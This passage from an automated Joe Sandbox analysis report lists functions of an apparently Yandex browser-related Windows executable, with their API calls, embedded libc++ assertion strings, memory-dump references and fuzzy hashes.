                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                        • Opcode ID: e633729ee0fca064e5c5b065c6d2daf4328d148a6d29e45279eb25e597e660fe
                                                                                                                        • Instruction ID: d0f9cee6d523a1ae73b0ec601a7e39b1f0441f6eacd4be5285ba19a21ffbe6ec
                                                                                                                        • Opcode Fuzzy Hash: e633729ee0fca064e5c5b065c6d2daf4328d148a6d29e45279eb25e597e660fe
                                                                                                                        • Instruction Fuzzy Hash: BED24B72E086298FDB65CE28ED407EAB7F9EB44304F1445EAD44DE7244E778AE818F41
                                                                                                                        Function 0084EC90 Relevance: 9.1, Strings: 7, Instructions: 347COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0084ED80
                                                                                                                        • ua-u, xrefs: 0084ECF8
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 0084ED87, 0084EF1B
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 0084ED79
                                                                                                                        • ua-r, xrefs: 0084ED0A
                                                                                                                        • /support/browser/about/install.xml, xrefs: 0084EE08, 0084EE16, 0084EE6C, 0084EE7A, 0084EEB3
                                                                                                                        • https://yandex., xrefs: 0084EDC9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$/support/browser/about/install.xml$https://yandex.$ua-r$ua-u
                                                                                                                        • API String ID: 0-4180415026
                                                                                                                        • Opcode ID: ae60533565815002ec37422e4b8917e94c1c6597770dc5bd1b449320a4bcbaa0
                                                                                                                        • Instruction ID: 24f7647e1f68c3dd4dcbb58fbb3cf3357332e425ac2ddcd2171f655950cbf5df
                                                                                                                        • Opcode Fuzzy Hash: ae60533565815002ec37422e4b8917e94c1c6597770dc5bd1b449320a4bcbaa0
                                                                                                                        • Instruction Fuzzy Hash: 8AC14771E0021D8FDB14CF68C881BBEBBB1FF96314F158199E905AB292D7716D84C7A2
                                                                                                                        Function 008D6B20 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 265COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000000,?,00000001), ref: 008D6BBD
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 008D6C33
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,00000001,?,008AD1F0,?,008D50B1,00000001,?,?,008AC5DD,?,00000001,?), ref: 008D6D22
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008D6C5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$Acquire$Release
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                                                                                        • API String ID: 1678258262-2888085009
                                                                                                                        • Opcode ID: dc3cb5429bf6df6033fd10763dea06112c9c5cb882e2a03225338fc78d68243a
                                                                                                                        • Instruction ID: 45151120d538d0e51487d431c4ae81c5b3f9951b66e01655d4dbc92fa4287c0b
                                                                                                                        • Opcode Fuzzy Hash: dc3cb5429bf6df6033fd10763dea06112c9c5cb882e2a03225338fc78d68243a
                                                                                                                        • Instruction Fuzzy Hash: 64911771B1020D8BDF149F6CDC81A6E77A6FF84724B18822AE449DB352FB31DC118796
                                                                                                                        Function 008B65E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 179COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(00966B40,?,?,00962570,009305AE,?,?,008AEA0C,00962570,?,?,?,?,?,?,-00000001), ref: 008B66D7
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00966B40,?,?,00962570,009305AE,?,?,008AEA0C,00962570,?,?,?,?,?,?,-00000001), ref: 008B6700
                                                                                                                        • _strlen.LIBCMT ref: 008B6789
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008B67E9
                                                                                                                          • Part of subcall function 008B6A20: _strlen.LIBCMT ref: 008B6A31
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008B67D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock_strlen$AcquireInit_thread_headerRelease
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length
                                                                                                                        • API String ID: 539046703-3833978849
                                                                                                                        • Opcode ID: e85a97af69d8833119fae98a47759ed62ed8859128694acc39b640742b7165cf
                                                                                                                        • Instruction ID: 0ed0f0ca40285167c49522fb9dfe33e35efa79063bc97c29db705dc0cfbde0c3
                                                                                                                        • Opcode Fuzzy Hash: e85a97af69d8833119fae98a47759ed62ed8859128694acc39b640742b7165cf
                                                                                                                        • Instruction Fuzzy Hash: FA515C76A08218CBCB14DF78C891ABAB7B1FB94718F04422DD806D7391EB75AC61CBC1
                                                                                                                        Function 00922E87 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,0092283D,00000002,00000000,?,?,?,0092283D,?,00000000), ref: 00922F20
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,0092283D,00000002,00000000,?,?,?,0092283D,?,00000000), ref: 00922F49
                                                                                                                        • GetACP.KERNEL32(?,?,0092283D,?,00000000), ref: 00922F5E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                        • Opcode ID: d4663edff454d354cad3cd0ff536203d1ef7fa89c5fb96d2dbdb1d5c9a82fc25
                                                                                                                        • Instruction ID: aa7cb8a88ff551325235d93f53c9eb4ac3729de9b723bb612620fc23f61406bf
                                                                                                                        • Opcode Fuzzy Hash: d4663edff454d354cad3cd0ff536203d1ef7fa89c5fb96d2dbdb1d5c9a82fc25
                                                                                                                        • Instruction Fuzzy Hash: 7F21C822704220B6D7349F54EE01BEB73BEEB54B60B968424E90AD710CE732DE41D750
                                                                                                                        Function 0085ED70 Relevance: 7.9, APIs: 5, Instructions: 387synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 0085EE9D
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000,?,000003E8,00000000,?,?,?,00000000), ref: 0085EF1A
                                                                                                                        • GetTickCount.KERNEL32 ref: 0085EF3B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$ObjectSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2051767920-0
                                                                                                                        • Opcode ID: c7b49f7d7eeb94fd20d9c1eaac68312dd8e782366e980fdc3fed70d126be150f
                                                                                                                        • Instruction ID: 3440387a194f92ab63516b9d2a61436678e1cc558d4a8553d44820b9d594f37e
                                                                                                                        • Opcode Fuzzy Hash: c7b49f7d7eeb94fd20d9c1eaac68312dd8e782366e980fdc3fed70d126be150f
                                                                                                                        • Instruction Fuzzy Hash: 36E1E371A10618CFDB15DF64C880AAEBBB1FF89305F188269ED49E7352DB30AD49CB41
                                                                                                                        Function 008B2270 Relevance: 7.8, Strings: 6, Instructions: 304COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • true, xrefs: 008B2565, 008B37A6, 008B37EA, 008B3832
                                                                                                                        • false, xrefs: 008B2560, 008B37AB
                                                                                                                        • null, xrefs: 008B2345, 008B2353, 008B247F, 008B3724, 008B375C, 008B376A
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008B30DE, 008B386C
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008B25F7, 008B29F8, 008B30D7, 008B3873
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008B30E5, 008B3865
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$false$null$true
                                                                                                                        • API String ID: 0-2153852974
                                                                                                                        • Opcode ID: 90cf9932baf5c92c926463e9123555941bd9c35427f33e640b439bbc1fb2a7ad
                                                                                                                        • Instruction ID: 6c47e96d5093db847d9a4071de14da6c1baf5d280fd5bb5e8252f25791e3db14
                                                                                                                        • Opcode Fuzzy Hash: 90cf9932baf5c92c926463e9123555941bd9c35427f33e640b439bbc1fb2a7ad
                                                                                                                        • Instruction Fuzzy Hash: C6B16771B042448FDB24DF28C855BEEBBE2FF96304F14892CE446EB792D674A841C751
                                                                                                                        Function 00922707 Relevance: 7.7, APIs: 5, Instructions: 182COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0091DF1A: GetLastError.KERNEL32(00000000,?,0091AB09), ref: 0091DF1E
                                                                                                                          • Part of subcall function 0091DF1A: SetLastError.KERNEL32(00000000,?,?,00000028,00914B7E), ref: 0091DFC0
                                                                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0092280F
                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 0092284D
                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00922860
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 009228A8
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 009228C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 415426439-0
                                                                                                                        • Opcode ID: bec5a48ca5e0676edf898c4bcaa50a7583b0f77221e58692007e0b741c5bb4d4
                                                                                                                        • Instruction ID: 38fd256ad4a4a5aaab92e35ec558952d68cdf8ed07d08d7936a9c99102f974c1
                                                                                                                        • Opcode Fuzzy Hash: bec5a48ca5e0676edf898c4bcaa50a7583b0f77221e58692007e0b741c5bb4d4
                                                                                                                        • Instruction Fuzzy Hash: 1A517C71A0422ABBDB20EFA5EC41BBA77BCBF48300F544469F901EB195E770DA40DB61
                                                                                                                        Function 0089AD80 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_header.LIBCMT ref: 0089ADD2
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0089AE08
                                                                                                                        • GetProductInfo.KERNEL32(?,?,00000000,00000000,?), ref: 0089AE1F
                                                                                                                        • __Init_thread_header.LIBCMT ref: 0089AE7B
                                                                                                                          • Part of subcall function 008FFBA7: EnterCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBB2
                                                                                                                          • Part of subcall function 008FFBA7: LeaveCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBEF
                                                                                                                        • GetNativeSystemInfo.KERNEL32(0096599C), ref: 0089AEAC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalInfoInit_thread_headerSection$EnterLeaveNativeProductSystemVersion
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4213586224-0
                                                                                                                        • Opcode ID: 498c7b346f11009e1504112c9a91d35df2950784334492ae2b4af96f9ebface7
                                                                                                                        • Instruction ID: 37671aa5375ce38ee6d7195dc072eb73a65f3e38fd6b2261c2610c77bbf9dc05
                                                                                                                        • Opcode Fuzzy Hash: 498c7b346f11009e1504112c9a91d35df2950784334492ae2b4af96f9ebface7
                                                                                                                        • Instruction Fuzzy Hash: EC3138B1904A04DFDB20EB24EC46BAE7770FF85738F864229F50986291D7712954DFD2
                                                                                                                        Function 00858230 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,0083EC4F,?,?,00000001,?,00858325,0083EC4F,BIN,?,0083EC4F,?,?), ref: 00858247
                                                                                                                        • FindResourceW.KERNEL32(00000000,0083EC4F,00858325,?,00858325,0083EC4F,BIN,?,0083EC4F,?,?,?,?,?,?,00976000), ref: 00858254
                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00858325,0083EC4F,BIN,?,0083EC4F,?,?,?,?,?,?,00976000), ref: 00858262
                                                                                                                        • LockResource.KERNEL32(00000000,?,00858325,0083EC4F,BIN,?,0083EC4F,?,?,?,?,?,?,00976000), ref: 0085826F
                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00858325,0083EC4F,BIN,?,0083EC4F,?,?,?,?,?,?,00976000), ref: 008582C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$FindHandleLoadLockModuleSizeof
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1601749889-0
                                                                                                                        • Opcode ID: 2f49a6ebe5b01632a28a9c2daa3180aff2191a39c6457ee8fe7b01ea7101b831
                                                                                                                        • Instruction ID: a38ba5b81111365b994bcfd3bcbcfecbb803bd4e56be5a56b1baeb24a54a873f
                                                                                                                        • Opcode Fuzzy Hash: 2f49a6ebe5b01632a28a9c2daa3180aff2191a39c6457ee8fe7b01ea7101b831
                                                                                                                        • Instruction Fuzzy Hash: F0119DB0A14305AFDB149B799C4493B7BA9FB88356B14852DE80AD7300EB30DC15DBA0
                                                                                                                        Function 00852960 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 224COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • AccessibleObjectFromWindow.OLEACC(?,FFFFFFFC,00933020,?,?,00000000,00000028,?,?,0084C8C9,?), ref: 00852A3A
                                                                                                                        • LresultFromObject.OLEACC(00933020,?,?), ref: 00852BA6
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00852A67
                                                                                                                        • =, xrefs: 00852B82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FromObject$AccessibleLresultWindow
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$=
                                                                                                                        • API String ID: 133265567-2330902163
                                                                                                                        • Opcode ID: 24c4aa5ecf133a706d855f30ff5bf4b8636b4cdb1f5d4519e6746bc6317862ee
                                                                                                                        • Instruction ID: 28de1ec8f2319d4cb4c02581b86ab08b574d1c5b744fe1170d6dead0991c6a2a
                                                                                                                        • Opcode Fuzzy Hash: 24c4aa5ecf133a706d855f30ff5bf4b8636b4cdb1f5d4519e6746bc6317862ee
                                                                                                                        • Instruction Fuzzy Hash: C8710871B0020A8BCB18CF65C891A6BB7E6FF95721B14C53EEC16DB251DB30E954CB51
                                                                                                                        Function 00878530 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00878538
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00878544
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
